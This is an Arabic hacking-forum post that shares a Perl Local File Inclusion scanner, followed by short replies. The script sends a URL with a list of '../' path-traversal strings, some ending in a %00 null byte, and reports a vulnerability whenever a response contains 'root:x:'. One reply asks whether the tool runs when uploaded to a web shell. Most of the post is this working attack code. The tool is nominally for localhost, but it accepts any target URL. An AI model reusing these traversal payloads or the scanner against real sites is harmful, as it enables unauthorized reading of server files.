[win > perl ] أداة أكتشاف ثغرات Local File Include على الوكال هوست

السلام عليكّم ورحمة الله وبركاتة
كيف حالكم أخواني عساكم بخير ؟!!
معي إداة بلغة perl طورتها قبل فترة , وحبيت أنزلها لكم
حقوق المبرمج والمطور مرفقة بـ السورس كود
المتطلبات : مترجم بيرل :o

#!/usr/bin/perl 
########################################################################## 
#programmer:kiddies or peneter@darkc0de (crasher_1412@yahoo.com)         # 
#special thanks: mywisdom,gunslinger(rock n rool man),flyff_666          # 
#(root admin in devilzc0de,petimati,spykit(admin in irc.dal.net          # 
#and irc.byroe.net devilzc0de),gonzhack martin(my brother),              # 
#7460(thanks for bcktrack 4)and bec0de@bec0de.com(thanks was             # 
#believe in me to be contributor                                         # 
#forum thanks:jasakom,echo.or.id,darkc0de,bec0de,codecall                # 
########################################################################## 
#     Dvi In win Local Host Is az7rb , My From Is P0c Team               # 
########################################################################## 
use LWP::UserAgent; 
use HTTP::Request; 
system('clear','cls'); 
print "=======================================================
"; 
print "=                                                     =
"; 
print "=          LFI_Scanner v 1.0 Win/Local-Host           =
"; 
print "=          ~[ Az7rb - P0c TeaM ]~                     =
"; 
print "=                                                     =
"; 
print "=    E.g: input : localhost/script/index.php?id=      =
"; 
print "=                                                     =
"; 
print "===================bec0de contributor==================

"; 
print '>';chomp($link = <STDIN>); 
if($link !~ /http:///) { $link = "http://$link"; } 
print "
>press [enter] to check the vulnerability in lfi[...]
"; 
$start =<STDIN>; 
@vuls = ( 
'readfile.txt', 
'../readfile.txt', 
'../../readfile.txt', 
'../../../readfile.txt', 
'../../../../readfile.txt', 
'../../../../../readfile.txt', 
'../../../../../../readfile.txt', 
'../../../../../../../readfile.txt', 
'../../../../../../../../readfile.txt', 
'../../../../../../../../../readfile.txt', 
'readfile.txt%00', 
'../readfile.txt%00', 
'../../readfile.txt%00', 
'../../../readfile.txt%00', 
'../../../../readfile.txt%00', 
'../../../../../readfile.txt%00', 
'../../../../../../readfile.txt%00', 
'../../../../../../../readfile.txt%00', 
'../../../../../../../../readfile.txt%00', 
'../../../../../../../../../readfile.txt%00'); 
print ">start scaning[...]
"; 
foreach $scan(@vuls){ 
$url = $link.$scan; 
$request = HTTP::Request->new(GET=>$url); 
$useragent = LWP::UserAgent->new(); 
$response = $useragent->request($request); 
if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerable_Read_File;} 
else { $msg = "no";} 
print "$scan..........[$msg]
"; 
}


تحميل الاداة من mediafire :
أضغط هنا
فيه ملف مهم أسمة readfile.txt حطه بمجلد www لما ترفعه , وفيه ملف أسمه lfi.php وضعته لكم لـ التجربة ، حطه بملف www
ومن الاداة أكتب

                         localhost/lfi.php?p0c=  

[b]وإذا طلع لك Vulnerable_Read_File يعني مصاب
وإذا طلع لك no يعني مو مصاب

eekeek[/b]
تحياتي ان شاء الله ترحيب
جديد ما بينكم انتضروني

جميل لكن عندي ملاحضة بما انو هذي الادات للوندوز لما لا تعتمد على الملف boot.ini ؟؟؟

يعطيك الف عافية

واصلـــــ

بارك الله فيك HACKeR Dz ddd وجعلها الله في ميزان حسناتك

وفيك بركة اخي الحبيب

ادا رفعته على شل يشتغل ؟

نسخ لصق !
http://www.d99y.com/vb/showthread.php?t=4492
يعطيك العافية

بارك الله فيك